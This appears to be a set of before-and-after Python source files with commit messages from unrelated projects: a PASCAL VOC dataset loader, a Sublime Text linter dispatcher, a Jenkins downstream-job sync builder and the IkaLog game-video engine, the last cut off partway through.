URL = 'http://host.robots.ox.ac.uk/pascal/VOC/voc2012/'\
'VOCtrainval_11-May-2012.tar'
CLASSES = [
'person', 'bird', 'cat', 'cow', 'dog', 'horse', 'sheep', 'aeroplane',
'bicycle', 'boat', 'bus', 'car', 'motorbike', 'train', 'bottle', 'chair',
'diningtable', 'pottedplant', 'sofa', 'tvmonitor'
]
WIDTH = 224
HEIGHT = 224
NUM_CHANNELS = 3
class PascalVOC(Datasets):
def __init__(self, data_dir, val_size=1500):
maybe_download_and_extract(URL, data_dir)
data_dir = os.path.join(data_dir, 'VOCdevkit', 'VOC2012')
names = os.listdir(os.path.join(data_dir, 'Annotations'))
names = [name.split('.')[0] for name in names]
names = sorted(names)
# PascalVOC didn't release the full test annotations yet, use the
# validation set instead :(
train = Dataset(names[val_size:], data_dir)
val = Dataset(names[:val_size], data_dir)
test = Dataset(names[:val_size], data_dir)
super(PascalVOC, self).__init__(train, val, test)
@property
def classes(self):
return CLASSES
@property
def width(self):
return WIDTH
@property
def height(self):
return HEIGHT
@property
def num_channels(self):
return NUM_CHANNELS
class Dataset(object):
def __init__(self, names, data_dir):
self.epochs_completed = 0
self._data_dir = data_dir
self._names = names
self._index_in_epoch = 0
@property
def num_examples(self):
return len(self._names)
def _random_shuffle_examples(self):
perm = np.arange(self.num_examples)
np.random.shuffle(perm)
self._names = [self._names[i] for i in perm]
def next_batch(self, batch_size, shuffle=True):
start = self._index_in_epoch
# Shuffle for the first epoch.
if self.epochs_completed == 0 and start == 0 and shuffle:
self._random_shuffle_examples()
if start + batch_size > self.num_examples:
# Finished epoch.
self.epochs_completed += 1
# Get the rest examples in this epoch.
rest_num_examples = self.num_examples - start
names_rest = self._names[start:self.num_examples]
# Shuffle the examples.
if shuffle:
self._random_shuffle_examples()
# Start next epoch.
start = 0
self._index_in_epoch = batch_size - rest_num_examples
end = self._index_in_epoch
names = names_rest + self._names[start:end]
else:
# Just slice the examples.
self._index_in_epoch += batch_size
end = self._index_in_epoch
names = self._names[start:end]
images = [self._read_image(name) for name in names]
labels = np.stack([self._read_label(name) for name in names])
return images, labels
def _read_image(self, name):
path = os.path.join(self._data_dir, 'JPEGImages',
'{}.jpg'.format(name))
image = imread(path)
# image = resize(image, (HEIGHT, WIDTH), mode='constant')
# No need to cast to float when image is resized
image = (1 / 255) * image.astype(np.float32)
return image.astype(np.float32)
def _read_label(self, name):
path = os.path.join(self._data_dir, 'Annotations',
'{}.xml'.format(name))
annotation = parse(path)
label = np.zeros((len(CLASSES)), np.uint8)
max_area = 0
max_name = ''
for obj in annotation.getElementsByTagName('object'):
name = obj.getElementsByTagName('name')[0].firstChild.nodeValue
bbox = obj.getElementsByTagName('bndbox')[0]
xmin = bbox.getElementsByTagName('xmin')[0].firstChild.nodeValue
xmax = bbox.getElementsByTagName('xmax')[0].firstChild.nodeValue
ymin = bbox.getElementsByTagName('ymin')[0].firstChild.nodeValue
ymax = bbox.getElementsByTagName('ymax')[0].firstChild.nodeValue
area = (float(xmax) - float(xmin)) * (float(ymax) - float(ymin))
if area > max_area:
max_area = area
max_name = name
label[CLASSES.index(max_name)] = 1
return label
typos, linting
from __future__ import division
from __future__ import print_function
import os
from xml.dom.minidom import parse
import numpy as np
from skimage.io import imread
from .dataset import Datasets
from .download import maybe_download_and_extract
URL = 'http://host.robots.ox.ac.uk/pascal/VOC/voc2012/'\
'VOCtrainval_11-May-2012.tar'
CLASSES = [
'person', 'bird', 'cat', 'cow', 'dog', 'horse', 'sheep', 'aeroplane',
'bicycle', 'boat', 'bus', 'car', 'motorbike', 'train', 'bottle', 'chair',
'diningtable', 'pottedplant', 'sofa', 'tvmonitor'
]
WIDTH = 224
HEIGHT = 224
NUM_CHANNELS = 3
class PascalVOC(Datasets):
def __init__(self, data_dir, val_size=1500):
maybe_download_and_extract(URL, data_dir)
data_dir = os.path.join(data_dir, 'VOCdevkit', 'VOC2012')
names = os.listdir(os.path.join(data_dir, 'Annotations'))
names = [name.split('.')[0] for name in names]
names = sorted(names)
# PascalVOC didn't release the full test annotations yet, use the
# validation set instead :(
train = Dataset(names[val_size:], data_dir)
val = Dataset(names[:val_size], data_dir)
test = Dataset(names[:val_size], data_dir)
super(PascalVOC, self).__init__(train, val, test)
@property
def classes(self):
return CLASSES
@property
def width(self):
return WIDTH
@property
def height(self):
return HEIGHT
@property
def num_channels(self):
return NUM_CHANNELS
class Dataset(object):
def __init__(self, names, data_dir):
self.epochs_completed = 0
self._data_dir = data_dir
self._names = names
self._index_in_epoch = 0
@property
def num_examples(self):
return len(self._names)
def _random_shuffle_examples(self):
perm = np.arange(self.num_examples)
np.random.shuffle(perm)
self._names = [self._names[i] for i in perm]
def next_batch(self, batch_size, shuffle=True):
start = self._index_in_epoch
# Shuffle for the first epoch.
if self.epochs_completed == 0 and start == 0 and shuffle:
self._random_shuffle_examples()
if start + batch_size > self.num_examples:
# Finished epoch.
self.epochs_completed += 1
# Get the rest examples in this epoch.
rest_num_examples = self.num_examples - start
names_rest = self._names[start:self.num_examples]
# Shuffle the examples.
if shuffle:
self._random_shuffle_examples()
# Start next epoch.
start = 0
self._index_in_epoch = batch_size - rest_num_examples
end = self._index_in_epoch
names = names_rest + self._names[start:end]
else:
# Just slice the examples.
self._index_in_epoch += batch_size
end = self._index_in_epoch
names = self._names[start:end]
images = [self._read_image(name) for name in names]
labels = np.stack([self._read_label(name) for name in names])
return images, labels
def _read_image(self, name):
path = os.path.join(self._data_dir, 'JPEGImages',
'{}.jpg'.format(name))
image = imread(path)
image = (1 / 255) * image.astype(np.float32)
return image.astype(np.float32)
def _read_label(self, name):
path = os.path.join(self._data_dir, 'Annotations',
'{}.xml'.format(name))
annotation = parse(path)
label = np.zeros((len(CLASSES)), np.uint8)
max_area = 0
max_name = ''
for obj in annotation.getElementsByTagName('object'):
name = obj.getElementsByTagName('name')[0].firstChild.nodeValue
bbox = obj.getElementsByTagName('bndbox')[0]
xmin = bbox.getElementsByTagName('xmin')[0].firstChild.nodeValue
xmax = bbox.getElementsByTagName('xmax')[0].firstChild.nodeValue
ymin = bbox.getElementsByTagName('ymin')[0].firstChild.nodeValue
ymax = bbox.getElementsByTagName('ymax')[0].firstChild.nodeValue
area = (float(xmax) - float(xmin)) * (float(ymax) - float(ymin))
if area > max_area:
max_area = area
max_name = name
label[CLASSES.index(max_name)] = 1
return label
|
import sublime
from concurrent.futures import ThreadPoolExecutor, as_completed, wait
from fnmatch import fnmatch
from itertools import chain
from functools import partial
import os
import traceback
from . import persist, util
WILDCARD_SYNTAX = '*'
def lint_view(view, hit_time, next):
"""
Lint the given view.
This is the top level lint dispatcher. It is called
asynchronously. The following checks are done for each linter
assigned to the view:
- Check if the linter has been disabled in settings.
- Check if the filename matches any patterns in the "excludes" setting.
If a linter fails the checks, it is disabled for this run.
Otherwise, if the mapped syntax is not in the linter's selectors,
the linter is run on the entirety of code.
Then the set of selectors for all linters assigned to the view is
aggregated, and for each selector, if it occurs in sections,
the corresponding section is linted as embedded code.
"""
linters, disabled_linters = get_linters(view)
# The contract here is that we MUST fire 'updates' for every linter, so
# that the views (status bar etc) actually update.
for linter in disabled_linters:
next(linter, [])
lint_tasks = get_lint_tasks(linters, view, hit_time)
run_concurrently(
partial(run_tasks, tasks, next=partial(next, linter))
for linter, tasks in lint_tasks
)
def run_tasks(tasks, next):
results = run_concurrently(tasks)
errors = list(chain.from_iterable(results)) # flatten and consume
# We don't want to guarantee that our consumers/views are thread aware.
# So we merge here into Sublime's shared worker thread. Sublime guarantees
# here to execute all scheduled tasks ordered and sequentially.
sublime.set_timeout_async(lambda: next(errors))
def get_lint_tasks(linters, view, hit_time):
for (linter, settings, regions) in get_lint_regions(linters, view):
def make_task(linter, settings, region):
code = view.substr(region)
offset = view.rowcol(region.begin())
return partial(
execute_lint_task, linter, code, offset, hit_time, settings
)
yield linter, map(partial(make_task, linter, settings), regions)
def execute_lint_task(linter, code, offset, hit_time, settings):
errors = linter.lint(code, hit_time, settings) or []
translate_lineno_and_column(errors, offset)
return errors
def translate_lineno_and_column(errors, offset):
if offset == (0, 0):
return
line_offset, col_offset = offset
for error in errors:
line = error['line']
error['line'] = line + line_offset
if line == 0:
error.update({
'start': error['start'] + col_offset,
'end': error['end'] + col_offset
})
def get_lint_regions(linters, view):
syntax = util.get_syntax(view)
for (linter, settings) in linters:
if (
syntax not in linter.selectors and
WILDCARD_SYNTAX not in linter.selectors
):
yield linter, settings, [sublime.Region(0, view.size())]
else:
yield linter, settings, [
region
for selector in get_selectors(linter, syntax)
for region in view.find_by_selector(selector)
]
def get_selectors(linter, wanted_syntax):
for syntax in [wanted_syntax, WILDCARD_SYNTAX]:
try:
yield linter.selectors[syntax]
except KeyError:
pass
def get_linters(view):
filename = view.file_name()
vid = view.id()
enabled, disabled = [], []
for linter in persist.view_linters.get(vid, []):
# First check to see if the linter can run in the current lint mode.
if linter.tempfile_suffix == '-' and view.is_dirty():
disabled.append(linter)
continue
view_settings = linter._get_view_settings()
if view_settings.get('disable'):
disabled.append(linter)
continue
if filename:
filename = os.path.realpath(filename)
excludes = util.convert_type(view_settings.get('excludes', []), [])
if excludes:
matched = False
for pattern in excludes:
if fnmatch(filename, pattern):
persist.debug(
'{} skipped \'{}\', excluded by \'{}\''
.format(linter.name, filename, pattern)
)
matched = True
break
if matched:
disabled.append(linter)
continue
enabled.append((linter, view_settings))
return enabled, disabled
def run_concurrently(tasks, max_workers=5):
with ThreadPoolExecutor(max_workers=max_workers) as executor:
work = [executor.submit(task) for task in tasks]
results = await_futures(work)
return list(results) # consume the generator immediately
def await_futures(fs, ordered=False):
if ordered:
done, _ = wait(fs)
else:
done = as_completed(fs)
for future in done:
try:
yield future.result()
except Exception:
...
traceback.print_exc()
Inline make_task
import sublime
from concurrent.futures import ThreadPoolExecutor, as_completed, wait
from fnmatch import fnmatch
from itertools import chain
from functools import partial
import os
import traceback
from . import persist, util
WILDCARD_SYNTAX = '*'
def lint_view(view, hit_time, next):
"""
Lint the given view.
This is the top level lint dispatcher. It is called
asynchronously. The following checks are done for each linter
assigned to the view:
- Check if the linter has been disabled in settings.
- Check if the filename matches any patterns in the "excludes" setting.
If a linter fails the checks, it is disabled for this run.
Otherwise, if the mapped syntax is not in the linter's selectors,
the linter is run on the entirety of code.
Then the set of selectors for all linters assigned to the view is
aggregated, and for each selector, if it occurs in sections,
the corresponding section is linted as embedded code.
"""
linters, disabled_linters = get_linters(view)
# The contract here is that we MUST fire 'updates' for every linter, so
# that the views (status bar etc) actually update.
for linter in disabled_linters:
next(linter, [])
lint_tasks = get_lint_tasks(linters, view, hit_time)
run_concurrently(
partial(run_tasks, tasks, next=partial(next, linter))
for linter, tasks in lint_tasks
)
def run_tasks(tasks, next):
results = run_concurrently(tasks)
errors = list(chain.from_iterable(results)) # flatten and consume
# We don't want to guarantee that our consumers/views are thread aware.
# So we merge here into Sublime's shared worker thread. Sublime guarantees
# here to execute all scheduled tasks ordered and sequentially.
sublime.set_timeout_async(lambda: next(errors))
def get_lint_tasks(linters, view, hit_time):
for (linter, settings, regions) in get_lint_regions(linters, view):
tasks = []
for region in regions:
code = view.substr(region)
offset = view.rowcol(region.begin())
tasks.append(partial(
execute_lint_task, linter, code, offset, hit_time, settings
))
yield linter, tasks
def execute_lint_task(linter, code, offset, hit_time, settings):
errors = linter.lint(code, hit_time, settings) or []
translate_lineno_and_column(errors, offset)
return errors
def translate_lineno_and_column(errors, offset):
if offset == (0, 0):
return
line_offset, col_offset = offset
for error in errors:
line = error['line']
error['line'] = line + line_offset
if line == 0:
error.update({
'start': error['start'] + col_offset,
'end': error['end'] + col_offset
})
def get_lint_regions(linters, view):
syntax = util.get_syntax(view)
for (linter, settings) in linters:
if (
syntax not in linter.selectors and
WILDCARD_SYNTAX not in linter.selectors
):
yield linter, settings, [sublime.Region(0, view.size())]
else:
yield linter, settings, [
region
for selector in get_selectors(linter, syntax)
for region in view.find_by_selector(selector)
]
def get_selectors(linter, wanted_syntax):
for syntax in [wanted_syntax, WILDCARD_SYNTAX]:
try:
yield linter.selectors[syntax]
except KeyError:
pass
def get_linters(view):
filename = view.file_name()
vid = view.id()
enabled, disabled = [], []
for linter in persist.view_linters.get(vid, []):
# First check to see if the linter can run in the current lint mode.
if linter.tempfile_suffix == '-' and view.is_dirty():
disabled.append(linter)
continue
view_settings = linter._get_view_settings()
if view_settings.get('disable'):
disabled.append(linter)
continue
if filename:
filename = os.path.realpath(filename)
excludes = util.convert_type(view_settings.get('excludes', []), [])
if excludes:
matched = False
for pattern in excludes:
if fnmatch(filename, pattern):
persist.debug(
'{} skipped \'{}\', excluded by \'{}\''
.format(linter.name, filename, pattern)
)
matched = True
break
if matched:
disabled.append(linter)
continue
enabled.append((linter, view_settings))
return enabled, disabled
def run_concurrently(tasks, max_workers=5):
with ThreadPoolExecutor(max_workers=max_workers) as executor:
work = [executor.submit(task) for task in tasks]
results = await_futures(work)
return list(results) # consume the generator immediately
def await_futures(fs, ordered=False):
if ordered:
done, _ = wait(fs)
else:
done = as_completed(fs)
for future in done:
try:
yield future.result()
except Exception:
...
traceback.print_exc()
|
from __future__ import absolute_import, division
import re
import time
from datetime import datetime
from flask import current_app
from changes.config import db
from changes.constants import Status
from changes.db.utils import get_or_create, create_or_update
from changes.models import TestResultManager, Node, JobPhase, JobStep
from changes.utils.agg import safe_agg
from .builder import JenkinsBuilder, NotFound, RESULT_MAP
BASE_XPATH = '/freeStyleProject/build[action/cause/upstreamProject="{upstream_job}" and action/cause/upstreamBuild="{build_no}"]/number'
DOWNSTREAM_XML_RE = re.compile(r'<number>(\d+)</number>')
class JenkinsFactoryBuilder(JenkinsBuilder):
provider = 'jenkins'
def __init__(self, *args, **kwargs):
self.downstream_job_names = kwargs.pop('downstream_job_names', ())
super(JenkinsFactoryBuilder, self).__init__(*args, **kwargs)
def _get_downstream_jobs(self, job, downstream_job_name):
xpath = BASE_XPATH.format(
upstream_job=job.data['job_name'],
build_no=job.data['build_no']
)
response = self._get_raw_response('/job/{job_name}/api/xml/'.format(
job_name=downstream_job_name,
), params={
'depth': 1,
'xpath': xpath,
'wrapper': 'a',
})
if not response:
return []
return map(int, DOWNSTREAM_XML_RE.findall(response))
def _sync_downstream_job(self, phase, job_name, build_no):
item = self._get_response('/job/{}/{}'.format(
job_name, build_no))
node, _ = get_or_create(Node, where={
'label': item['builtOn'],
})
values = {
'date_started': datetime.utcfromtimestamp(
item['timestamp'] / 1000),
}
if item['building']:
values['status'] = Status.in_progress
else:
values['status'] = Status.finished
values['result'] = RESULT_MAP[item['result']]
# values['duration'] = item['duration'] or None
values['date_finished'] = datetime.utcfromtimestamp(
(item['timestamp'] + item['duration']) / 1000)
jobstep, created = create_or_update(JobStep, where={
'phase': phase,
'label': item['fullDisplayName'],
'job_id': phase.job_id,
'project_id': phase.project_id,
'node_id': node.id,
'data': {
'job_name': job_name,
'queued': False,
'item_id': None,
'build_no': build_no,
},
}, values=values)
if 'backend' not in jobstep.data:
jobstep.data.update({
'backend': {
'uri': item['url'],
'label': item['fullDisplayName'],
}
})
db.session.add(jobstep)
return jobstep
def _sync_test_results(self, job):
# sync any upstream results we may have collected
try:
test_report = self._get_response('/job/{job_name}/{build_no}/testReport/'.format(
job_name=job.data['job_name'],
build_no=job.data['build_no'],
))
except NotFound:
test_list = []
else:
test_list = self._process_test_report(job, test_report)
# for any downstream jobs, pull their results using xpath magic
for downstream_job_name in self.downstream_job_names:
# XXX(dcramer): this is kind of gross, as we create the phase first
# so we have an ID to reference, and then we update it with the
# collective stats
jobphase, created = get_or_create(JobPhase, where={
'job': job,
'label': downstream_job_name,
}, defaults={
'status': job.status,
'result': job.result,
'project_id': job.project_id,
})
db.session.commit()
jobsteps = []
for build_no in self._get_downstream_jobs(job, downstream_job_name):
# XXX(dcramer): ideally we would grab this with the first query
# but because we dont want to rely on an XML parser, we're doing
# a second http request for build details
downstream_jobstep = self._sync_downstream_job(
jobphase, downstream_job_name, build_no)
jobsteps.append(downstream_jobstep)
try:
test_report = self._get_response('/job/{job_name}/{build_no}/testReport/'.format(
job_name=downstream_job_name,
build_no=build_no,
))
except NotFound:
pass
else:
test_list.extend(self._process_test_report(job, test_report))
db.session.commit()
try:
start = time.time()
result = True
while result:
if time.time() - start > 15:
raise Exception('Took too long to sync log')
result = self._sync_log(
jobstep=downstream_jobstep,
name=downstream_jobstep.label,
job_name=downstream_job_name,
build_no=build_no,
)
except Exception:
db.session.rollback()
current_app.logger.exception(
'Unable to sync console log for job step %r',
downstream_jobstep.id.hex)
db.session.commit()
if jobsteps:
# update phase statistics
jobphase.date_started = safe_agg(
min, (s.date_started for s in jobsteps), default=job.date_started)
jobphase.date_finished = safe_agg(
max, (s.date_finished for s in jobsteps), default=job.date_finished)
# jobphase.duration = (jobphase.date_finished - jobphase.date_started).total_seconds()
else:
jobphase.date_started = job.date_started
jobphase.date_finished = job.date_finished
db.session.add(jobphase)
db.session.commit()
manager = TestResultManager(job)
with db.session.begin_nested():
manager.save(test_list)
Collect artifacts from downstream jobs
from __future__ import absolute_import, division
import re
import time
from datetime import datetime
from flask import current_app
from changes.config import db
from changes.constants import Status
from changes.db.utils import get_or_create, create_or_update
from changes.models import TestResultManager, Node, JobPhase, JobStep
from changes.utils.agg import safe_agg
from .builder import JenkinsBuilder, NotFound, RESULT_MAP
BASE_XPATH = '/freeStyleProject/build[action/cause/upstreamProject="{upstream_job}" and action/cause/upstreamBuild="{build_no}"]/number'
DOWNSTREAM_XML_RE = re.compile(r'<number>(\d+)</number>')
class JenkinsFactoryBuilder(JenkinsBuilder):
provider = 'jenkins'
def __init__(self, *args, **kwargs):
self.downstream_job_names = kwargs.pop('downstream_job_names', ())
super(JenkinsFactoryBuilder, self).__init__(*args, **kwargs)
def _get_downstream_jobs(self, job, downstream_job_name):
xpath = BASE_XPATH.format(
upstream_job=job.data['job_name'],
build_no=job.data['build_no']
)
response = self._get_raw_response('/job/{job_name}/api/xml/'.format(
job_name=downstream_job_name,
), params={
'depth': 1,
'xpath': xpath,
'wrapper': 'a',
})
if not response:
return []
return map(int, DOWNSTREAM_XML_RE.findall(response))
def _sync_downstream_job(self, phase, job_name, build_no):
item = self._get_response('/job/{}/{}'.format(
job_name, build_no))
node, _ = get_or_create(Node, where={
'label': item['builtOn'],
})
values = {
'date_started': datetime.utcfromtimestamp(
item['timestamp'] / 1000),
}
if item['building']:
values['status'] = Status.in_progress
else:
values['status'] = Status.finished
values['result'] = RESULT_MAP[item['result']]
# values['duration'] = item['duration'] or None
values['date_finished'] = datetime.utcfromtimestamp(
(item['timestamp'] + item['duration']) / 1000)
jobstep, created = create_or_update(JobStep, where={
'phase': phase,
'label': item['fullDisplayName'],
'job_id': phase.job_id,
'project_id': phase.project_id,
'node_id': node.id,
'data': {
'job_name': job_name,
'queued': False,
'item_id': None,
'build_no': build_no,
},
}, values=values)
if 'backend' not in jobstep.data:
jobstep.data.update({
'backend': {
'uri': item['url'],
'label': item['fullDisplayName'],
}
})
db.session.add(jobstep)
for artifact in item.get('artifacts', ()):
self.sync_artifact(job=phase.job, artifact=artifact)
return jobstep
def _sync_test_results(self, job):
# sync any upstream results we may have collected
try:
test_report = self._get_response('/job/{job_name}/{build_no}/testReport/'.format(
job_name=job.data['job_name'],
build_no=job.data['build_no'],
))
except NotFound:
test_list = []
else:
test_list = self._process_test_report(job, test_report)
# for any downstream jobs, pull their results using xpath magic
for downstream_job_name in self.downstream_job_names:
# XXX(dcramer): this is kind of gross, as we create the phase first
# so we have an ID to reference, and then we update it with the
# collective stats
jobphase, created = get_or_create(JobPhase, where={
'job': job,
'label': downstream_job_name,
}, defaults={
'status': job.status,
'result': job.result,
'project_id': job.project_id,
})
db.session.commit()
jobsteps = []
for build_no in self._get_downstream_jobs(job, downstream_job_name):
# XXX(dcramer): ideally we would grab this with the first query
# but because we dont want to rely on an XML parser, we're doing
# a second http request for build details
downstream_jobstep = self._sync_downstream_job(
jobphase, downstream_job_name, build_no)
jobsteps.append(downstream_jobstep)
try:
test_report = self._get_response('/job/{job_name}/{build_no}/testReport/'.format(
job_name=downstream_job_name,
build_no=build_no,
))
except NotFound:
pass
else:
test_list.extend(self._process_test_report(job, test_report))
db.session.commit()
try:
start = time.time()
result = True
while result:
if time.time() - start > 15:
raise Exception('Took too long to sync log')
result = self._sync_log(
jobstep=downstream_jobstep,
name=downstream_jobstep.label,
job_name=downstream_job_name,
build_no=build_no,
)
except Exception:
db.session.rollback()
current_app.logger.exception(
'Unable to sync console log for job step %r',
downstream_jobstep.id.hex)
db.session.commit()
if jobsteps:
# update phase statistics
jobphase.date_started = safe_agg(
min, (s.date_started for s in jobsteps), default=job.date_started)
jobphase.date_finished = safe_agg(
max, (s.date_finished for s in jobsteps), default=job.date_finished)
# jobphase.duration = (jobphase.date_finished - jobphase.date_started).total_seconds()
else:
jobphase.date_started = job.date_started
jobphase.date_finished = job.date_finished
db.session.add(jobphase)
db.session.commit()
manager = TestResultManager(job)
with db.session.begin_nested():
manager.save(test_list)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import copy
import cv2
import pprint
import sys
import time
import traceback
from ikalog.utils import *
from . import scenes
# The IkaLog core engine.
#
class IkaEngine:
# Profiling
def _profile_dump_scenes(self):
for scene in self.scenes:
print('%4.3fs %s' % (scene._prof_time_took, scene))
def _profile_dump(self):
self._profile_dump_scenes()
def enable_profile(self):
self._enable_profile = True
def disble_profile(self):
self._enable_profile = False
# Exception Logging
def _exception_log_init(self, context):
context['engine']['exceptions_log'] = {}
def _exception_log_dump(self, context):
if not 'exceptions_log' in context['engine']:
self._exception_log_init(context)
if len(context['engine']['exceptions_log']) > 0:
pprint.pprint(context['engine']['exceptions_log'])
def _exception_log_append(self, context, name, text):
if not 'exceptions_log' in context['engine']:
self._exception_log_init(context)
d = context['engine']['exceptions_log']
count = d.get(name, {'count': 0})['count']
d[name] = {
'count': count + 1,
'text': text,
}
#
def on_game_individual_result(self, context):
self.session_close_wdt = context['engine']['msec'] + (20 * 1000)
def on_result_gears(self, context):
if self.session_close_wdt is not None:
self.session_close_wdt = context['engine']['msec'] + (1 * 1000)
def on_game_lost_sync(self, context):
self.session_abort()
def dprint(self, text):
print(text, file=sys.stderr)
def call_plugins(self, event_name, params=None, debug=False):
if debug:
self.dprint('call plug-in hook (%s):' % event_name)
for op in self.output_plugins:
if hasattr(op, event_name):
if debug:
self.dprint('Call %s' % op.__class__.__name__)
try:
if params is None:
getattr(op, event_name)(self.context)
else:
getattr(op, event_name)(self.context, params)
except:
self.dprint('%s.%s() raised a exception >>>>' %
(op.__class__.__name__, event_name))
self.dprint(traceback.format_exc())
self.dprint('<<<<<')
elif hasattr(op, 'onUncatchedEvent'):
if debug:
self.dprint(
'call plug-in hook (UncatchedEvent, %s):' % event_name)
try:
getattr(op, 'onUncatchedEvent')(event_name, self.context)
except:
self.dprint('%s.%s() raised a exception >>>>' %
(op.__class__.__name__, event_name))
self.dprint(traceback.format_exc())
self.dprint('<<<<<')
def call_plugins_later(self, event_name, params=None, debug=False):
self._event_queue.append((event_name, params))
def read_next_frame(self, skip_frames=0):
for i in range(skip_frames):
frame = self.capture.read_frame()
frame = self.capture.read_frame()
while frame is None:
self.call_plugins('on_frame_read_failed')
if self._stop:
return None, None
cv2.waitKey(1000)
frame = self.capture.read_frame()
t = self.capture.get_current_timestamp()
self.context['engine']['msec'] = t
self.context['engine']['frame'] = frame
self.context['engine']['preview'] = copy.deepcopy(frame)
self.call_plugins('on_debug_read_next_frame')
return frame, t
def stop(self):
self.call_plugins('on_stop')
self._stop = True
def reset(self):
# Initalize the context
self.context['game'] = {
'map': None,
'rule': None,
'won': None,
'players': None,
'kills': 0,
'dead': False,
'death_reasons': {},
'inkling_state': [None, None],
# Float values of start and end times scince the epoch in second.
# They are used with IkaUtils.GetTime.
'start_time': None,
'end_time': None,
# Int values of start and end offset times in millisecond.
# They are used with context['engine']['msec']
'start_offset_msec': None,
'end_offset_msec': None,
}
self.call_plugins('on_game_reset')
self._exception_log_init(self.context)
def create_context(self):
self.context = {
'engine': {
'engine': self,
'epoch_time': None,
'frame': None,
'service': {
'call_plugins': self.call_plugins,
'call_plugins_later': self.call_plugins,
# For backward compatibility
'callPlugins': self.call_plugins,
},
'exceptions_log': {
},
},
'scenes': {
},
'config': {
},
'lobby': {
}
}
self.reset()
self.session_close_wdt = None
def session_close(self):
self.session_close_wdt = None
if not self.context['game']['end_time']:
# end_time should be initialized in GameFinish.
# This is a fallback in case GameFinish was skipped.
self.context['game']['end_time'] = IkaUtils.getTime(self.context)
self.context['game']['end_offset_msec'] = self.context['engine']['msec']
self.call_plugins('on_game_session_end')
self.reset()
def session_abort(self):
self.session_close_wdt = None
if not self.context['game']['end_time']:
# end_time should be initialized in GameFinish or session_close.
# This is a fallback in case they were skipped.
self.context['game']['end_time'] = IkaUtils.getTime(self.context)
self.context['game']['end_offset_msec'] = self.context['engine'].get('msec', None)
self.call_plugins('on_game_session_abort')
self.reset()
def process_scene(self, scene):
context = self.context
try:
scene.new_frame(context)
scene.match(context)
except:
if self._abort_at_scene_exception:
raise
scene_name = scene.__class__.__name__
desc = traceback.format_exc()
self.dprint('%s raised a exception >>>>' % scene_name)
self.dprint(desc)
self.dprint('<<<<<')
self._exception_log_append(context, scene_name, desc)
def find_scene_object(self, scene_class_name):
for scene in self.scenes:
if scene.__class__.__name__ == scene_class_name:
return scene
return None
def process_frame(self):
context = self.context
frame, t = self.read_next_frame()
if frame is None:
return False
context['engine']['inGame'] = self.find_scene_object(
'GameTimerIcon').match(context)
self.call_plugins('on_frame_read')
for scene in self.scenes:
self.process_scene(scene)
if self.session_close_wdt is not None:
if self.session_close_wdt < context['engine']['msec']:
self.dprint('Watchdog fired. Closing current session')
self.session_close()
key = None
self.call_plugins('on_draw_preview')
self.call_plugins('on_show_preview')
# FixMe: Since on_frame_next and on_key_press has non-standard arguments,
# self.call_plugins() doesn't work for those.
for op in self.output_plugins:
if hasattr(op, "on_frame_next"):
try:
key = op.on_frame_next(context)
except:
pass
for op in self.output_plugins:
if hasattr(op, "on_key_press"):
try:
op.on_key_press(context, key)
except:
pass
while len(self._event_queue) > 0:
event = self._event_queue.pop(0)
self.call_plugins(event_name=event[0], params=event[1])
def _main_loop(self):
while not self._stop:
if self._pause:
time.sleep(0.5)
continue
try:
self.process_frame()
except EOFError:
# EOF. Close session if close_session_at_eof is set.
if self.close_session_at_eof:
if self.session_close_wdt is not None:
self.dprint('Closing current session at EOF')
self.session_close()
else:
self.session_abort()
self._stop = True
cv2.destroyAllWindows()
def run(self):
try:
self._main_loop()
finally:
if self._enable_profile:
self._profile_dump()
if 1:
self._exception_log_dump(self.context)
def set_capture(self, capture):
self.capture = capture
self.context['engine']['input_class'] = self.capture.__class__.__name__
def set_epoch_time(self, epoch_time):
self.context['engine']['epoch_time'] = epoch_time
def set_plugins(self, plugins):
self.output_plugins = [self]
self.output_plugins.extend(self.scenes)
self.output_plugins.extend(plugins)
def pause(self, pause):
self._pause = pause
def _initialize_scenes(self):
self.scenes = [
scenes.GameTimerIcon(self),
scenes.GameStart(self),
scenes.GameGoSign(self),
scenes.GameKill(self),
scenes.GameDead(self),
scenes.GameOutOfBound(self),
scenes.GameFinish(self),
scenes.GameSpecialGauge(self),
scenes.GameSpecialWeapon(self),
scenes.GameRankedBattleEvents(self),
scenes.PaintScoreTracker(self),
scenes.ObjectiveTracker(self),
scenes.SplatzoneTracker(self),
scenes.InklingsTracker(self),
scenes.ResultJudge(self),
scenes.ResultDetail(self),
scenes.ResultUdemae(self),
scenes.ResultGears(self),
scenes.ResultFesta(self),
scenes.Lobby(self),
# scenes.Downie(self),
scenes.Blank(self),
]
def __init__(self, enable_profile=False, abort_at_scene_exception=False):
self._initialize_scenes()
self.output_plugins = [self]
self.last_capture = time.time() - 100
self._stop = False
self._pause = True
self._event_queue = []
self.close_session_at_eof = False
self._enable_profile = enable_profile
self._abort_at_scene_exception = abort_at_scene_exception
self.create_context()
ikalog/engine: autopep8 and so on.
- Applied autopep8
- In some functions, assign context (reference to self.context)
- Define context["engine"]["msec"] at create_context(). No longer it cannot be undefined reference.
Signed-off-by: Takeshi HASEGAWA <80595b5c49522665976d35e515d02ac963124d00@gmail.com>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import copy
import cv2
import pprint
import sys
import time
import traceback
from ikalog.utils import *
from . import scenes
# The IkaLog core engine.
#
class IkaEngine:
# Profiling
def _profile_dump_scenes(self):
for scene in self.scenes:
print('%4.3fs %s' % (scene._prof_time_took, scene))
def _profile_dump(self):
self._profile_dump_scenes()
def enable_profile(self):
self._enable_profile = True
def disble_profile(self):
self._enable_profile = False
# Exception Logging
def _exception_log_init(self, context):
